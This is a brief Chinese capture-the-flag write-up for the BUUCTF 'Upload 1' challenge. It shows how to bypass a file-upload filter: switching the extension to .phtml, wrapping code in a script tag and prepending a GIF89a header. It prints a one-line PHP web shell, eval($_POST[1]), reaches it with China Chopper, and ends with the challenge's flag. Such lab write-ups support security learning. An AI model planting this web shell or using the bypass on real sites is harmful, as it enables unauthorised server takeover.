提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[极客大挑战 2019]Upload 1
一、做题步骤
1.上传php文件
1.上传PHP文件,会提示这不是图片
2.将PHP文件后缀名修改为jpg,通过burpsuite抓包修改后缀名为PHP
3.将后缀名修改为phtml
提示文件中带有php文件头部
4.修改文件头部
提示这还是php文件
<script language="php">
eval($_POST[1]);
</script>
5.加上GIF头部 GIF89a
上传成功
2.菜刀连接
1.添加信息
2.在根目录下找到flag文件,点击flag文件即获取flag{e62cf843-2692-439a-9850-62e31ba20482}